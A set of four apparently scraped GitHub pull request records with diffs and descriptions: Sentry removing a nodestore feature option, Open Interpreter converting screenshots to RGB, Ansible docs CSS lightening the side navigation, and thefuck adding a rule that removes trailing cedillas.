-from sentry import eventstore, options
+from sentry import eventstore
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.lang.native.applecrashreport import AppleCrashReport
@@ -24,9 +24,6 @@ def get(self, request, project, event_id):
if event is None:
raise ResourceDoesNotExist
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
if event.platform not in ("cocoa", "native"):
return HttpResponse(
{"message": "Only cocoa events can return an apple crash report"}, status=403
diff --git a/src/sentry/api/endpoints/event_file_committers.py b/src/sentry/api/endpoints/event_file_committers.py
index 099686801c500a..7616bf90a9ca32 100644
--- a/src/sentry/api/endpoints/event_file_committers.py
+++ b/src/sentry/api/endpoints/event_file_committers.py
@@ -2,7 +2,7 @@
from rest_framework.response import Response
-from sentry import eventstore, options
+from sentry import eventstore
from sentry.api.bases.project import ProjectEndpoint
from sentry.models import Commit, Release
from sentry.utils.committers import get_serialized_event_file_committers
@@ -26,10 +26,6 @@ def get(self, request, project, event_id):
if event is None:
return Response({"detail": "Event not found"}, status=404)
- # populate event data
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
try:
committers = get_serialized_event_file_committers(
project, event, frame_limit=int(request.GET.get("frameLimit", 25))
diff --git a/src/sentry/api/endpoints/event_grouping_info.py b/src/sentry/api/endpoints/event_grouping_info.py
index 9b3bd1a3616734..416f15c63d4450 100644
--- a/src/sentry/api/endpoints/event_grouping_info.py
+++ b/src/sentry/api/endpoints/event_grouping_info.py
@@ -4,7 +4,7 @@
from django.http import HttpResponse
-from sentry import eventstore, options
+from sentry import eventstore
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.grouping.api import GroupingConfigNotFound
@@ -24,9 +24,6 @@ def get(self, request, project, event_id):
if event is None:
raise ResourceDoesNotExist
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
rv = {}
config_name = request.GET.get("config") or None
diff --git a/src/sentry/api/endpoints/event_owners.py b/src/sentry/api/endpoints/event_owners.py
index cac75bdc42ec1f..9007a6b0da4e81 100644
--- a/src/sentry/api/endpoints/event_owners.py
+++ b/src/sentry/api/endpoints/event_owners.py
@@ -3,7 +3,7 @@
import six
from rest_framework.response import Response
-from sentry import eventstore, options
+from sentry import eventstore
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.fields.actor import Actor
from sentry.api.serializers import serialize
@@ -26,10 +26,6 @@ def get(self, request, project, event_id):
if event is None:
return Response({"detail": "Event not found"}, status=404)
- # populate event data
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
owners, rules = ProjectOwnership.get_owners(project.id, event.data)
# For sake of the API, we don't differentiate between
diff --git a/src/sentry/api/endpoints/project_group_index.py b/src/sentry/api/endpoints/project_group_index.py
index 2eaab4fb98a1f5..cf4ab33cd60a13 100644
--- a/src/sentry/api/endpoints/project_group_index.py
+++ b/src/sentry/api/endpoints/project_group_index.py
@@ -5,7 +5,7 @@
import six
from rest_framework.response import Response
-from sentry import analytics, eventstore, options, search
+from sentry import analytics, eventstore, search
from sentry.api.base import DocSection, EnvironmentMixin
from sentry.api.bases.project import ProjectEndpoint, ProjectEventPermission
from sentry.api.helpers.group_index import (
@@ -151,9 +151,6 @@ def get(self, request, project):
pass
else:
matching_event = eventstore.get_event_by_id(project.id, event_id)
- if matching_event is not None:
- if not options.get("eventstore.use-nodestore"):
- matching_event.bind_node_data()
elif matching_group is None:
matching_group = get_by_short_id(
project.organization_id, request.GET.get("shortIdLookup"), query
diff --git a/src/sentry/eventstore/base.py b/src/sentry/eventstore/base.py
index 438f8a60e96266..aafa80384aae5d 100644
--- a/src/sentry/eventstore/base.py
+++ b/src/sentry/eventstore/base.py
@@ -117,14 +117,13 @@ def get_events(
"""
raise NotImplementedError
- def get_event_by_id(self, project_id, event_id, additional_columns=None):
+ def get_event_by_id(self, project_id, event_id):
"""
Gets a single event given a project_id and event_id.
Arguments:
project_id (int): Project ID
event_id (str): Event ID
- additional_columns: (Sequence[Column]) - List of addition columns to fetch - default None
"""
raise NotImplementedError
diff --git a/src/sentry/eventstore/snuba/backend.py b/src/sentry/eventstore/snuba/backend.py
index 2d786fdcdbade9..5c0a18515673bd 100644
--- a/src/sentry/eventstore/snuba/backend.py
+++ b/src/sentry/eventstore/snuba/backend.py
@@ -5,7 +5,6 @@
from copy import deepcopy
from datetime import datetime, timedelta
-from sentry import options
from sentry.eventstore.base import EventStorage
from sentry.snuba.events import Columns
from sentry.utils import snuba
@@ -76,7 +75,7 @@ def get_events(
return []
- def get_event_by_id(self, project_id, event_id, additional_columns=None):
+ def get_event_by_id(self, project_id, event_id):
"""
Get an event given a project ID and event ID
Returns None if an event cannot be found
@@ -86,22 +85,6 @@ def get_event_by_id(self, project_id, event_id, additional_columns=None):
if not event_id:
return None
- if options.get("eventstore.use-nodestore"):
- return self.__get_event_by_id_nodestore(project_id, event_id)
-
- cols = self.__get_columns(additional_columns)
-
- result = snuba.raw_query(
- selected_columns=cols,
- filter_keys={"event_id": [event_id], "project_id": [project_id]},
- referrer="eventstore.get_event_by_id",
- limit=1,
- )
- if "error" not in result and len(result["data"]) == 1:
- return self.__make_event(result["data"][0])
- return None
-
- def __get_event_by_id_nodestore(self, project_id, event_id):
event = Event(project_id=project_id, event_id=event_id)
event.bind_node_data()
diff --git a/src/sentry/integrations/issues.py b/src/sentry/integrations/issues.py
index a1e15e43473128..d49c11992553ab 100644
--- a/src/sentry/integrations/issues.py
+++ b/src/sentry/integrations/issues.py
@@ -3,7 +3,7 @@
import logging
import six
-from sentry import features, options
+from sentry import features
from sentry.integrations.exceptions import ApiError, IntegrationError
from sentry.models import Activity, ExternalIssue, Group, GroupLink, GroupStatus, Organization
from sentry.utils.http import absolute_uri
@@ -58,9 +58,6 @@ def get_create_issue_config(self, group, **kwargs):
in Jira, VSTS, GitHub, etc
"""
event = group.get_latest_event()
- if event is not None:
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
return [
{
diff --git a/src/sentry/web/frontend/error_page_embed.py b/src/sentry/web/frontend/error_page_embed.py
index 33359f931712ad..936f736eefa93f 100644
--- a/src/sentry/web/frontend/error_page_embed.py
+++ b/src/sentry/web/frontend/error_page_embed.py
@@ -152,8 +152,6 @@ def dispatch(self, request):
event = eventstore.get_event_by_id(report.project.id, report.event_id)
if event is not None:
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
report.environment = event.get_environment()
report.group = event.group
diff --git a/src/sentry/web/frontend/group_event_json.py b/src/sentry/web/frontend/group_event_json.py
index 34c608872f4e0b..33c18d3c5d960c 100644
--- a/src/sentry/web/frontend/group_event_json.py
+++ b/src/sentry/web/frontend/group_event_json.py
@@ -2,7 +2,7 @@
from django.http import Http404, HttpResponse
-from sentry import eventstore, options
+from sentry import eventstore
from sentry.models import Group, GroupMeta, get_group_with_redirect
from sentry.utils import json
@@ -28,9 +28,6 @@ def get(self, request, organization, group_id, event_id_or_latest):
if event is None:
raise Http404
- if event_id_or_latest != "latest" and not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
GroupMeta.objects.populate_cache([group])
return HttpResponse(json.dumps(event.as_dict()), content_type="application/json")
diff --git a/tests/integration/tests.py b/tests/integration/tests.py
index a34553686a3e40..467e69a5e89046 100644
--- a/tests/integration/tests.py
+++ b/tests/integration/tests.py
@@ -176,7 +176,7 @@ def path(self):
return reverse("sentry-api-store")
def get_event(self, event_id):
- instance = eventstore.get_event_by_id(self.project.id, event_id, eventstore.full_columns)
+ instance = eventstore.get_event_by_id(self.project.id, event_id)
instance.bind_node_data()
return instance
diff --git a/tests/sentry/eventstore/snuba/test_backend.py b/tests/sentry/eventstore/snuba/test_backend.py
index efecdfdf77494c..8ce93fbe7b0347 100644
--- a/tests/sentry/eventstore/snuba/test_backend.py
+++ b/tests/sentry/eventstore/snuba/test_backend.py
@@ -3,8 +3,6 @@
import six
import pytest
-from django.conf import settings
-
from sentry.testutils import TestCase, SnubaTestCase
from sentry.testutils.helpers.datetime import iso_format, before_now
from sentry.eventstore.snuba.backend import SnubaEventStorage
@@ -90,21 +88,13 @@ def test_get_events(self):
assert events == []
def test_get_event_by_id(self):
- # Get event with default columns
+ # Get valid event
event = self.eventstore.get_event_by_id(self.project1.id, "a" * 32)
assert event.id == "a" * 32
assert event.event_id == "a" * 32
assert event.project_id == self.project1.id
- # Get all columns
- event = self.eventstore.get_event_by_id(
- self.project2.id, "b" * 32, self.eventstore.full_columns
- )
- assert event.id == "b" * 32
- assert event.event_id == "b" * 32
- assert event.project_id == self.project2.id
-
# Get non existent event
event = self.eventstore.get_event_by_id(self.project2.id, "f" * 32)
assert event is None
@@ -117,22 +107,19 @@ def test_get_event_by_id(self):
assert event.project_id == self.project2.id
def test_get_event_by_id_nodestore(self):
- options = settings.SENTRY_OPTIONS.copy()
- options["eventstore.use-nodestore"] = True
- with self.settings(SENTRY_OPTIONS=options):
- event = self.eventstore.get_event_by_id(self.project1.id, "a" * 32)
- assert event
- assert event.group_id == event.group.id
-
- # Transaction event
- event = self.eventstore.get_event_by_id(self.project2.id, "d" * 32)
- assert event
- assert not event.group_id
- assert not event.group
-
- # Non existent event
- event = self.eventstore.get_event_by_id(self.project.id, "f" * 32)
- assert not event
+ event = self.eventstore.get_event_by_id(self.project1.id, "a" * 32)
+ assert event
+ assert event.group_id == event.group.id
+
+ # Transaction event
+ event = self.eventstore.get_event_by_id(self.project2.id, "d" * 32)
+ assert event
+ assert not event.group_id
+ assert not event.group
+
+ # Non existent event
+ event = self.eventstore.get_event_by_id(self.project.id, "f" * 32)
+ assert not event
def test_get_next_prev_event_id(self):
event = self.eventstore.get_event_by_id(self.project2.id, "b" * 32)
| This feature has been rolled out in production, and we are now fetching
from Nodestore instead of Snuba. We don't want to keep this option
anymore. | https://api.github.com/repos/getsentry/sentry/pulls/16421 | 2020-01-13T21:00:44Z | 2020-01-15T18:32:56Z | 2020-01-15T18:32:56Z | 2020-12-19T14:52:28Z | 3,286 | getsentry/sentry | 44,246 |
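A rough sketch of the result (hypothetical stand-ins for the Sentry internals, not the real implementation): with the option removed, every lookup goes straight through `bind_node_data()`, and the Snuba query branch disappears.

```python
class Event:
    """Hypothetical stand-in for sentry.eventstore's Event class."""
    def __init__(self, project_id, event_id):
        self.project_id = project_id
        self.event_id = event_id
        self.data = None

    def bind_node_data(self):
        # Pretend nodestore lookup; the real one fetches the event payload blob.
        self.data = {"event_id": self.event_id}


def get_event_by_id(project_id, event_id):
    # The snuba.raw_query branch previously guarded by
    # options.get("eventstore.use-nodestore") is gone: nodestore is the only path.
    if not event_id:
        return None
    event = Event(project_id=project_id, event_id=event_id)
    event.bind_node_data()
    return event
```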
Fix cli crash during screenshot generation | diff --git a/interpreter/core/computer/display/display.py b/interpreter/core/computer/display/display.py
index f34ea39d4..724bcbf35 100644
--- a/interpreter/core/computer/display/display.py
+++ b/interpreter/core/computer/display/display.py
@@ -1,15 +1,11 @@
import base64
-import os
import pprint
-import subprocess
-import tempfile
import time
import warnings
from io import BytesIO
import matplotlib.pyplot as plt
import requests
-from PIL import Image
from ..utils.recipient_utils import format_to_recipient
@@ -17,7 +13,6 @@
# from utils.get_active_window import get_active_window
try:
- import cv2
import numpy as np
import pyautogui
except:
@@ -70,8 +65,6 @@ def screenshot(self, show=True, quadrant=None, active_app_only=False):
)
return
- temp_file = tempfile.NamedTemporaryFile(suffix=".png", delete=False)
-
if quadrant == None:
# Implement active_app_only!
if active_app_only:
@@ -103,30 +96,20 @@ def screenshot(self, show=True, quadrant=None, active_app_only=False):
else:
raise ValueError("Invalid quadrant. Choose between 1 and 4.")
- screenshot.save(temp_file.name)
-
# Open the image file with PIL
- img = Image.open(temp_file.name)
-
- # Delete the temporary file
- try:
- os.remove(temp_file.name)
- except Exception as e:
- # On windows, this can fail due to permissions stuff??
- # (PermissionError: [WinError 32] The process cannot access the file because it is being used by another process: 'C:\\Users\\killi\\AppData\\Local\\Temp\\tmpgc2wscpi.png')
- if self.computer.verbose:
- print(str(e))
+ # IPython interactive mode auto-displays plots, causing RGBA handling issues, possibly MacOS-specific.
+ screenshot = screenshot.convert("RGB")
if show:
# Show the image using matplotlib
- plt.imshow(np.array(img))
+ plt.imshow(np.array(screenshot))
with warnings.catch_warnings():
# It displays an annoying message about Agg not being able to display something or WHATEVER
warnings.simplefilter("ignore")
plt.show()
- return img
+ return screenshot
def find_text(self, text, screenshot=None):
# Take a screenshot
| ### Description of changes:
Implemented a fix that addresses an RGBA handling issue during screenshot generation when using IPython with auto-display.
The issue happens because `show=True` is set in `Display.screenshot`, and on a Mac the generated screenshot has an alpha channel (RGBA instead of RGB). When IPython attempts to display this image and convert it to JPEG, the process crashes (the exact cause is unclear).
This PR introduces a simple fix that enforces RGB mode in all cases.
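As a minimal standalone illustration of the fix (a Pillow sketch, not the project's code): forcing `convert("RGB")` drops the alpha channel that trips up the later JPEG conversion.

```python
from PIL import Image

# A 4x4 semi-transparent red image, mimicking a macOS screenshot with alpha.
screenshot = Image.new("RGBA", (4, 4), (255, 0, 0, 128))

# Saving an RGBA image as JPEG raises OSError; converting first avoids that.
rgb = screenshot.convert("RGB")  # discards the alpha channel
print(rgb.mode)  # → RGB
```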
I chose not to alter the default value of `show` because there may be use cases that depend on the current behavior, and this change is less likely to introduce new issues.
In the following commit, I performed a minor refactor related to the change I made: instead of saving/loading the image into a file that is neither used nor exposed, we now directly use the memory buffer. I separated this into another commit in case it causes any issues or if there are anticipated future uses for the file-based approach, making it easier to roll back or opt not to merge.
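The in-memory variant can be sketched like this (standalone Pillow example, not the project's code) — the PNG bytes never touch disk:

```python
from io import BytesIO
from PIL import Image

img = Image.new("RGB", (4, 4), (0, 128, 255))

buf = BytesIO()              # in-memory buffer replaces the NamedTemporaryFile
img.save(buf, format="PNG")
buf.seek(0)

reloaded = Image.open(buf)   # round-trip without ever writing a file
```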
Thank you for the amazing project. ;)
### Reference any relevant issues (e.g. "Fixes #000"):
Fixes #878
### Pre-Submission Checklist (optional but appreciated):
- [ ] I have included relevant documentation updates (stored in /docs)
- [X] I have read `docs/CONTRIBUTING.md`
- [X] I have read `docs/ROADMAP.md`
### OS Tests (optional but appreciated):
- [ ] Tested on Windows
- [X] Tested on MacOS
- [ ] Tested on Linux
| https://api.github.com/repos/OpenInterpreter/open-interpreter/pulls/884 | 2024-01-08T04:35:18Z | 2024-01-09T04:42:03Z | 2024-01-09T04:42:03Z | 2024-01-09T04:42:04Z | 542 | OpenInterpreter/open-interpreter | 40,789 |
lighten navigation background to make section labels easier to read for core docs | diff --git a/docs/docsite/_static/core.css b/docs/docsite/_static/core.css
index 8fde5e01ad4e51..5a7b0a1717c54d 100644
--- a/docs/docsite/_static/core.css
+++ b/docs/docsite/_static/core.css
@@ -27,4 +27,4 @@ table.documentation-table .value-name {
font-weight: bold;
display: inline;
}
-*/table.documentation-table .value-type{font-size:x-small;color:purple;display:inline}table.documentation-table .value-separator{font-size:x-small;display:inline}table.documentation-table .value-required{font-size:x-small;color:red;display:inline}.value-added-in{font-size:x-small;font-style:italic;color:green;display:inline}/*! Ansible-specific CSS pulled out of rtd theme for 2.9 */.DocSiteProduct-header{flex:1;-webkit-flex:1;padding:10px 20px 20px;display:flex;display:-webkit-flex;flex-direction:column;-webkit-flex-direction:column;align-items:center;-webkit-align-items:center;justify-content:flex-start;-webkit-justify-content:flex-start;margin-left:20px;margin-right:20px;text-decoration:none;font-weight:400;font-family:"Open Sans",sans-serif}.DocSiteProduct-header:active,.DocSiteProduct-header:focus,.DocSiteProduct-header:visited{color:#fff}.DocSiteProduct-header--core{font-size:25px;background-color:#161b1f;border:2px solid #161b1f;border-top-left-radius:4px;border-top-right-radius:4px;color:#fff;padding-left:2px;margin-left:2px}.DocSiteProduct-headerAlign{width:100%}.DocSiteProduct-logo{width:60px;height:60px;margin-bottom:-9px}.DocSiteProduct-logoText{margin-top:6px;font-size:25px;text-align:left}.DocSiteProduct-CheckVersionPara{margin-left:2px;padding-bottom:4px;margin-right:2px;margin-bottom:10px}/*! Ansible color scheme */.wy-nav-top,.wy-side-nav-search{background-color:#161b1f}.wy-menu-vertical header,.wy-menu-vertical p.caption{color:#161b1f}.wy-menu-vertical a{padding:0}.wy-menu-vertical a.reference.internal{padding:.4045em 1.618em}/*! Override sphinx rtd theme max-with of 800px */.wy-nav-content{max-width:100%}/*! Override sphinx_rtd_theme - keeps left-nav from overwriting Documentation title */.wy-nav-side{top:45px}/*! Ansible - changed absolute to relative to remove extraneous side scroll bar */.wy-grid-for-nav{position:relative}/*! Ansible narrow the search box */.wy-side-nav-search input[type=text]{width:90%;padding-left:24px}/*! 
Ansible - remove so highlight indenting is correct */.rst-content .highlighted{padding:0}.DocSiteBanner{display:flex;display:-webkit-flex;justify-content:center;-webkit-justify-content:center;flex-wrap:wrap;-webkit-flex-wrap:wrap;margin-bottom:25px}.DocSiteBanner-imgWrapper{max-width:100%}td,th{min-width:100px}table{overflow-x:auto;display:block;max-width:100%}.documentation-table td.elbow-placeholder{border-left:1px solid #000;border-top:0;width:30px;min-width:30px}.documentation-table td,.documentation-table th{padding:4px;border-left:1px solid #000;border-top:1px solid #000}.documentation-table{border-right:1px solid #000;border-bottom:1px solid #000}@media print{*{background:0 0!important;color:#000!important;text-shadow:none!important;filter:none!important;-ms-filter:none!important}#nav,a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}abbr[title]:after{content:" (" attr(title) ")"}.ir a:after,a[href^="javascript:"]:after,a[href^="#"]:after{content:""}/*! Don't show links for images, or javascript/internal links */pre,blockquote{border:0 solid #999;page-break-inside:avoid}thead{display:table-header-group}/*! 
h5bp.com/t */tr,img{page-break-inside:avoid}img{max-width:100%!important}@page{margin:.5cm}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}#google_image_div,.DocSiteBanner{display:none!important}}#sideBanner,.DocSite-globalNav{display:none}.DocSite-sideNav{display:block;margin-bottom:40px}.DocSite-nav{display:none}.ansibleNav{background:#000;padding:0 20px;width:auto;border-bottom:1px solid #444;font-size:14px;z-index:1}.ansibleNav ul{list-style:none;padding-left:0;margin-top:0}.ansibleNav ul li{padding:7px 0;border-bottom:1px solid #444}.ansibleNav ul li:last-child{border:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:6px 0}.ansibleNav ul li a:hover{color:#161b1f;background:0 0}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}@media screen and (min-width:768px){.DocSite-globalNav{display:block;position:fixed}#sideBanner{display:block}.DocSite-sideNav{display:none}.DocSite-nav{flex:initial;-webkit-flex:initial;display:flex;display:-webkit-flex;flex-direction:row;-webkit-flex-direction:row;justify-content:flex-start;-webkit-justify-content:flex-start;padding:15px;background-color:#000;text-decoration:none;font-family:"Open Sans",sans-serif}.DocSiteNav-logo{width:28px;height:28px;margin-right:8px;margin-top:-6px;position:fixed;z-index:1}.DocSiteNav-title{color:#fff;font-size:20px;position:fixed;margin-left:40px;margin-top:-4px;z-index:1}.ansibleNav{height:45px;width:100%;font-size:13px;padding:0 60px 0 0}.ansibleNav ul{float:right;display:flex;flex-wrap:nowrap;margin-top:13px}.ansibleNav ul li{padding:0;border-bottom:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:8px 13px}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}}@media screen and 
(min-width:768px){#sideBanner,.DocSite-globalNav{display:block}.DocSite-sideNav{display:none}.DocSite-nav{flex:initial;-webkit-flex:initial;display:flex;display:-webkit-flex;flex-direction:row;-webkit-flex-direction:row;justify-content:flex-start;-webkit-justify-content:flex-start;padding:15px;background-color:#000;text-decoration:none;font-family:"Open Sans",sans-serif}.DocSiteNav-logo{width:28px;height:28px;margin-right:8px;margin-top:-6px;position:fixed}.DocSiteNav-title{color:#fff;font-size:20px;position:fixed;margin-left:40px;margin-top:-4px}.ansibleNav{height:45px;font-size:13px;padding:0 60px 0 0}.ansibleNav ul{float:right;display:flex;flex-wrap:nowrap;margin-top:13px}.ansibleNav ul li{padding:0;border-bottom:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:8px 13px}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}}tr:hover .ansibleOptionLink::after{visibility:visible}tr .ansibleOptionLink::after{content:"";font-family:FontAwesome}tr .ansibleOptionLink{visibility:hidden;display:inline-block;font:normal normal normal 14px/1 FontAwesome;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media screen and (min-width:767px){section [id]{padding-top:45px;margin-top:-45px}section a[id]{padding-top:0;margin-top:0}}
+*/table.documentation-table .value-type{font-size:x-small;color:purple;display:inline}table.documentation-table .value-separator{font-size:x-small;display:inline}table.documentation-table .value-required{font-size:x-small;color:red;display:inline}.value-added-in{font-size:x-small;font-style:italic;color:green;display:inline}/*! Ansible-specific CSS pulled out of rtd theme for 2.9 */.DocSiteProduct-header{flex:1;-webkit-flex:1;padding:10px 20px 20px;display:flex;display:-webkit-flex;flex-direction:column;-webkit-flex-direction:column;align-items:center;-webkit-align-items:center;justify-content:flex-start;-webkit-justify-content:flex-start;margin-left:20px;margin-right:20px;text-decoration:none;font-weight:400;font-family:"Open Sans",sans-serif}.DocSiteProduct-header:active,.DocSiteProduct-header:focus,.DocSiteProduct-header:visited{color:#fff}.DocSiteProduct-header--core{font-size:25px;background-color:#161b1f;border:2px solid #161b1f;border-top-left-radius:4px;border-top-right-radius:4px;color:#fff;padding-left:2px;margin-left:2px}.DocSiteProduct-headerAlign{width:100%}.DocSiteProduct-logo{width:60px;height:60px;margin-bottom:-9px}.DocSiteProduct-logoText{margin-top:6px;font-size:25px;text-align:left}.DocSiteProduct-CheckVersionPara{margin-left:2px;padding-bottom:4px;margin-right:2px;margin-bottom:10px}/*! Ansible color scheme */.wy-nav-top,.wy-side-nav-search{background-color:#161b1f}.wy-menu-vertical header,.wy-menu-vertical p.caption{color:#161b1f}.wy-menu-vertical a{padding:0}.wy-menu-vertical a.reference.internal{padding:.4045em 1.618em}/*! Override sphinx rtd theme max-with of 800px */.wy-nav-content{max-width:100%}/*! Override sphinx_rtd_theme - keeps left-nav from overwriting Documentation title */.wy-nav-side{top:45px;background:#999}/*! Ansible - changed absolute to relative to remove extraneous side scroll bar */.wy-grid-for-nav{position:relative}/*! Ansible narrow the search box */.wy-side-nav-search input[type=text]{width:90%;padding-left:24px}/*! 
Ansible - remove so highlight indenting is correct */.rst-content .highlighted{padding:0}.DocSiteBanner{display:flex;display:-webkit-flex;justify-content:center;-webkit-justify-content:center;flex-wrap:wrap;-webkit-flex-wrap:wrap;margin-bottom:25px}.DocSiteBanner-imgWrapper{max-width:100%}td,th{min-width:100px}table{overflow-x:auto;display:block;max-width:100%}.documentation-table td.elbow-placeholder{border-left:1px solid #000;border-top:0;width:30px;min-width:30px}.documentation-table td,.documentation-table th{padding:4px;border-left:1px solid #000;border-top:1px solid #000}.documentation-table{border-right:1px solid #000;border-bottom:1px solid #000}@media print{*{background:0 0!important;color:#000!important;text-shadow:none!important;filter:none!important;-ms-filter:none!important}#nav,a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}abbr[title]:after{content:" (" attr(title) ")"}.ir a:after,a[href^="javascript:"]:after,a[href^="#"]:after{content:""}/*! Don't show links for images, or javascript/internal links */pre,blockquote{border:0 solid #999;page-break-inside:avoid}thead{display:table-header-group}/*! 
h5bp.com/t */tr,img{page-break-inside:avoid}img{max-width:100%!important}@page{margin:.5cm}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}#google_image_div,.DocSiteBanner{display:none!important}}#sideBanner,.DocSite-globalNav{display:none}.DocSite-sideNav{display:block;margin-bottom:40px}.DocSite-nav{display:none}.ansibleNav{background:#000;padding:0 20px;width:auto;border-bottom:1px solid #444;font-size:14px;z-index:1}.ansibleNav ul{list-style:none;padding-left:0;margin-top:0}.ansibleNav ul li{padding:7px 0;border-bottom:1px solid #444}.ansibleNav ul li:last-child{border:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:6px 0}.ansibleNav ul li a:hover{color:#161b1f;background:0 0}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}@media screen and (min-width:768px){.DocSite-globalNav{display:block;position:fixed}#sideBanner{display:block}.DocSite-sideNav{display:none}.DocSite-nav{flex:initial;-webkit-flex:initial;display:flex;display:-webkit-flex;flex-direction:row;-webkit-flex-direction:row;justify-content:flex-start;-webkit-justify-content:flex-start;padding:15px;background-color:#000;text-decoration:none;font-family:"Open Sans",sans-serif}.DocSiteNav-logo{width:28px;height:28px;margin-right:8px;margin-top:-6px;position:fixed;z-index:1}.DocSiteNav-title{color:#fff;font-size:20px;position:fixed;margin-left:40px;margin-top:-4px;z-index:1}.ansibleNav{height:45px;width:100%;font-size:13px;padding:0 60px 0 0}.ansibleNav ul{float:right;display:flex;flex-wrap:nowrap;margin-top:13px}.ansibleNav ul li{padding:0;border-bottom:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:8px 13px}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}}@media screen and 
(min-width:768px){#sideBanner,.DocSite-globalNav{display:block}.DocSite-sideNav{display:none}.DocSite-nav{flex:initial;-webkit-flex:initial;display:flex;display:-webkit-flex;flex-direction:row;-webkit-flex-direction:row;justify-content:flex-start;-webkit-justify-content:flex-start;padding:15px;background-color:#000;text-decoration:none;font-family:"Open Sans",sans-serif}.DocSiteNav-logo{width:28px;height:28px;margin-right:8px;margin-top:-6px;position:fixed}.DocSiteNav-title{color:#fff;font-size:20px;position:fixed;margin-left:40px;margin-top:-4px}.ansibleNav{height:45px;font-size:13px;padding:0 60px 0 0}.ansibleNav ul{float:right;display:flex;flex-wrap:nowrap;margin-top:13px}.ansibleNav ul li{padding:0;border-bottom:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:8px 13px}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}}tr:hover .ansibleOptionLink::after{visibility:visible}tr .ansibleOptionLink::after{content:"";font-family:FontAwesome}tr .ansibleOptionLink{visibility:hidden;display:inline-block;font:normal normal normal 14px/1 FontAwesome;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media screen and (min-width:767px){section [id]{padding-top:45px;margin-top:-45px}section a[id]{padding-top:0;margin-top:0}}
| ##### SUMMARY
Updated core.css to lighten the left-hand navigation background and make section headings easier to see.
Since diffs are hard to read in minified CSS, this PR adds the changed rule below:
.wy-nav-side{top:45px;background:#999}
##### ISSUE TYPE
- Docs Pull Request
##### COMPONENT NAME
docs/docsite/_static/core.css
| https://api.github.com/repos/ansible/ansible/pulls/74356 | 2021-04-20T20:14:42Z | 2021-04-22T18:54:27Z | 2021-04-22T18:54:27Z | 2021-06-24T14:59:17Z | 3,499 | ansible/ansible | 49,115 |
Custom rule: Remove trailing cedillas | diff --git a/README.md b/README.md
index 254f2b2be..14984fdc3 100644
--- a/README.md
+++ b/README.md
@@ -215,6 +215,7 @@ using the matched rule and runs it. Rules enabled by default are as follows:
* `python_execute` – appends missing `.py` when executing Python files;
* `quotation_marks` – fixes uneven usage of `'` and `"` when containing args';
* `react_native_command_unrecognized` – fixes unrecognized `react-native` commands;
+* `remove_trailing_cedilla` – remove trailling cedillas `ç`, a common typo for european keyboard layouts;
* `rm_dir` – adds `-rf` when you trying to remove directory;
* `sed_unterminated_s` – adds missing '/' to `sed`'s `s` commands;
* `sl_ls` – changes `sl` to `ls`;
diff --git a/tests/rules/test_remove_trailing_cedilla.py b/tests/rules/test_remove_trailing_cedilla.py
new file mode 100644
index 000000000..377ff8fc7
--- /dev/null
+++ b/tests/rules/test_remove_trailing_cedilla.py
@@ -0,0 +1,15 @@
+import pytest
+from thefuck.rules.remove_trailing_cedilla import match, get_new_command, CEDILLA
+from tests.utils import Command
+
+@pytest.mark.parametrize('command', [
+ Command(script='wrong' + CEDILLA),
+ Command(script='wrong with args' + CEDILLA)])
+def test_match(command):
+ assert match(command)
+
+@pytest.mark.parametrize('command, new_command', [
+ (Command('wrong' + CEDILLA), 'wrong'),
+ (Command('wrong with args' + CEDILLA), 'wrong with args')])
+def test_get_new_command(command, new_command):
+ assert get_new_command(command) == new_command
diff --git a/thefuck/rules/remove_trailing_cedilla.py b/thefuck/rules/remove_trailing_cedilla.py
new file mode 100644
index 000000000..311864486
--- /dev/null
+++ b/thefuck/rules/remove_trailing_cedilla.py
@@ -0,0 +1,9 @@
+# encoding=utf8
+
+CEDILLA = u"ç"
+
+def match(command):
+ return command.script.endswith(CEDILLA)
+
+def get_new_command(command):
+ return command.script[:-1]
| ### Summary
Many programmers use european keyboards, like this one:

Some users (like me) have fat fingers, and when pressing the `enter` key we also hit that tedious `ç` key. I've created this new rule to fix those typos.
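Mirroring the rule in the diff above, the fix is plain string trimming — a self-contained sketch:

```python
CEDILLA = "ç"

def match(script):
    # Fires only when the typed command ends with the stray cedilla.
    return script.endswith(CEDILLA)

def get_new_command(script):
    # Drop the final character to recover the intended command.
    return script[:-1]

print(get_new_command("ls -laç"))  # → ls -la
```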
### Features
- [x] Create a new rule to match those cases, and fix them.
- [x] Create a new test.
### Questions
- Should the priority be changed to a lower value?
### References
- [Cedilla in Wikipedia](https://en.wikipedia.org/wiki/Cedilla)
- [Keyboard layouts in Wikipedia](https://en.wikipedia.org/wiki/Keyboard_layout)
| https://api.github.com/repos/nvbn/thefuck/pulls/552 | 2016-09-29T10:00:31Z | 2016-10-02T15:19:49Z | 2016-10-02T15:19:49Z | 2016-10-02T15:19:54Z | 568 | nvbn/thefuck | 30,559 |
